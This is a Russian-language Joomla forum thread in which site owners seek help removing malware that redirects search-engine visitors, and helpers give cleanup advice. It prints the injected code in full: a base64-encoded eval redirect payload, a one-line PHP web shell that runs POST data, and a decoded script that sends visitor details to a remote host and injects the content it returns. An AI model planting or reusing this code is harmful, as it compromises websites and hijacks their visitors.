Не могу найти редирект

rembot

Захожу иногда
101
2 / 0
+++

Не могу найти редирект

« : 23.01.2012, 11:53:46 »

Сайт sro-oboronstroy.ru был заражен вирусом, в .php файлы был обавлен код:

Код

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vYnJ1Z2dlLm9zYS5wbC8iKTsNCmV4aXQoKTsNCn0NCn0NCn0NCn0="));

На сайте был установлен движок Joomla 1.5.20. Далее опишу мою последовательность действий:

1) Обновил движок до 1.5.25, т.е. все файлы новые не зараженные.
2) Удалил код из php-файлов шаблона, 10 раз проверил все чисто.
3) В папке images удалил post.php
4) Сменил пароль ftp и админку на всякий пожарный.

Сайт работает нормально если впрямую вводить адрес в браузере, а если переходить с Яндекса срабатывает редирект на левый сайт, где я не почистил, что проверить?

Записан

flyingspook

Moderator
3590
247 / 9

Re: Не могу найти редирект

« Ответ #1 : 23.01.2012, 12:08:42 »

логи выложите сюда

Записан

ЛЕЧИМ САЙТЫ ОТ ВИРУСОВ и Shell! & НОВЫЙ СКАНЕР ПОИСКА Shell and BackDoor
Сканер поиска Shell and BackDoor
Отличный хостинг для Ваших сайтов. Настраиваем сервера.

rembot

Захожу иногда
101
2 / 0
+++

Re: Не могу найти редирект

« Ответ #2 : 23.01.2012, 12:37:40 »

Цитировать

логи выложите сюда

Папка logs - пуста. Хотя на хостинге выгрузка access_log включено. Или я просто туплю(((

Записан

oriol

Завсегдатай
1042
100 / 4

Re: Не могу найти редирект

« Ответ #3 : 23.01.2012, 12:50:26 »

у тебя но хосте должна быть либо папка либо кнопка логов (это их папка а не твоя)
или задай им вопрос как посмотреть логи

p.s. еще должен бить файл с таким содержанием

Код

<?php eval(base64_decode($_POST["php"])); ?>

если не удалял тогда ищи

« Последнее редактирование: 23.01.2012, 12:56:19 от oriol »

Записан

rembot

Захожу иногда
101
2 / 0
+++

Re: Не могу найти редирект

« Ответ #4 : 23.01.2012, 13:02:14 »

Цитировать

у тебя но хосте должна быть либо папка либо кнопка логов (это их папка а не твоя)
или задай им вопрос как посмотреть логи

p.s. еще должен бить файл с таким содержанием
Код:

<?php eval(base64_decode($_POST["php"])); ?>

если не удалял тогда ищи

На хосте отдельная папка logs, но логов в ней нет. Сейчас буду звонить хостеру и разговаривать.

А на счет файла, был файл с таким содержанием в images/post.php - удалил я его.

Записан

icom

Давно я тут
830
202 / 4

Re: Не могу найти редирект

« Ответ #5 : 23.01.2012, 19:05:22 »

Код

@error_reporting(0); 
if (!isset($eva1fYlbakBcVSir)) {
	if (!isset($evalUdCXTDQERmWnDS)) {
	
		function retrun($return) {
			$funciton = create_function("&$"."function","$"."function = chr(ord($"."function)-3);");
			$return = str_split($return);
			array_walk($return, $funciton);
			return base64_decode(implode("",$return));
		}
		
		$psi1 = $tsst52;
		
		$evalTtDntGsohDPt = array('Google', 'Slurp', 'MSNBot', 'ia_archiver', 'Yandex', 'Rambler');
		
		function evalWEMBIkqYOIIGcLBn($s) {
			return @file_get_contents($s);
		}
	
		if ((preg_match("/".implode("|", $evalTtDntGsohDPt)."/i", $_SERVER['HTTP_USER_AGENT'])) or (isset($_COOKIE['stats']))) {} 
		else { 
			@setcookie("stats", md5('stats'), time()+10800);
			$file_content = evalWEMBIkqYOIIGcLBn('http://'.$dd0().'/in.php?i='.$_SERVER['REMOTE_ADDR'].'&b='.urlencode($_SERVER['HTTP_USER_AGENT']).'&b='.urlencode($_SERVER['HTTP_HOST']));
		
			if (strstr($file_content, "!go!")) { 
				$file_content = explode("!go!", $file_content);
				$file_content = $file_content[1];
				echo $file_content;
			}
		
			$evalUdCXTDQERmWnDS =18792;
		}
	}
}

может что-то потерялось при расшифровке, функция $dd0() точно, но смысл можно понять

Записан

oriol

Завсегдатай
1042
100 / 4

Re: Не могу найти редирект

« Ответ #6 : 27.01.2012, 13:16:18 »

Товарищ rembot вы здесь решение проблемы искали, а что это у вас?

http://sro-oboronstroy.ru/index.php?id=365 (здесь должна быть ошибка 404)
http://sro-oboronstroy.ru/sro-oboronstroy.ru/index.php?option=com_content&view=article&id=38 (Глава 2. Кто тут ещё?)

это для раздумия

Спойлер

[свернуть]

« Последнее редактирование: 27.01.2012, 13:23:06 от oriol »

Записан

rembot

Захожу иногда
101
2 / 0
+++

Re: Не могу найти редирект

« Ответ #7 : 27.01.2012, 13:37:41 »

Цитировать

Товарищ rembot вы здесь решение проблемы искали а что это у вас

http://sro-oboronstroy.ru/index.php?id=365 (здесь должна быть ошибка 404)
http://sro-oboronstroy.ru/sro-oboronstroy.ru/index.php?option=com_content&view=article&id=38 (Глава 2. Кто тут ещё?)

Не знаю что это.... А из статьи на сколько я понял, кроме моего сайта есть нехороший сосед?))

Записан

Helg

Захожу иногда
59
0 / 0

Re: Не могу найти редирект

« Ответ #8 : 19.02.2013, 18:17:11 »

Добрый день!

Помогите разобраться! Ко всем материалам на сайте добавляется скрытая ссылка на сторонний сайт. В Google выводится название статьи и сразу же эта левая ссылка! Перерыл уже нереальное число файлов, как найти и убить этот код?? Вот сделал скан кода http://www.ex.ua/view_storage/619161955259

Записан

draff

Гуру
5801
434 / 7
ищу работу

Re: Не могу найти редирект

« Ответ #9 : 19.02.2013, 18:51:39 »

В шаблоне есть папка /html/com_content/article ?
Ищи по маске base64_decode

Записан

Удалю вирус с сайта. Обновление Joomla!, JoomShopping, Virtuemart Интеграция Retailcrm | Отзывы

Helg

Захожу иногда
59
0 / 0

Re: Не могу найти редирект

« Ответ #10 : 19.02.2013, 20:22:58 »

Цитата: draff от 19.02.2013, 18:51:39

В шаблоне есть папка /html/com_content/article ?
Ищи по маске base64_decode

Фух! Спасибо большое! Нашел код base64_decode в файле article! Потом забросил к корневую папку програмку для поиска кодов, вбил base64_decode, нашло в больше чем 30 файлах. Но я не совсем понял, там нет кода, только встречается сами слова base64_decode.

Записан

Редирект на спам ссылки. Как лчить? Автор Евгений1980	Ответов: 2 Просмотров: 2490	14.02.2024, 13:15:59 от wishlight
Вирус редирект или взлом с редиректом Joomla 3.10 Автор Wany205	Ответов: 1 Просмотров: 3470	25.05.2023, 08:49:57 от Театрал
Всплывающее спам-сообщение+редирект на Joomla 2.5.14 Автор bonusfree	Ответов: 21 Просмотров: 2324	02.12.2020, 21:56:30 от bonusfree
Вирус на сайте, редирект, что делать как лечить! Автор flyingspook	Ответов: 792 Просмотров: 291978	23.02.2020, 21:18:16 от draff
Помгите удалить вирус на сайте. В теме понимаю, но найти вирус не могу( Автор Anvesinus	Ответов: 2 Просмотров: 1925	21.07.2019, 17:46:09 от Anvesinus

Не могу найти редирект - Безопасность сайтов на Joomla

Новости Joomla

Совет по Joomla: использовать выключенное состояние для кнопок в списках элементов админки

Онлайн-трансляции Joomla-разработки Игоря Бердичевского

20 лет Joomla: Ринат Кажетов

rembot

Не могу найти редирект

flyingspook

Re: Не могу найти редирект

rembot

Re: Не могу найти редирект

oriol

Re: Не могу найти редирект

rembot

Re: Не могу найти редирект

icom

Re: Не могу найти редирект

oriol

Re: Не могу найти редирект

rembot

Re: Не могу найти редирект

Helg

Re: Не могу найти редирект

draff

Re: Не могу найти редирект

Helg

Re: Не могу найти редирект

Похожие темы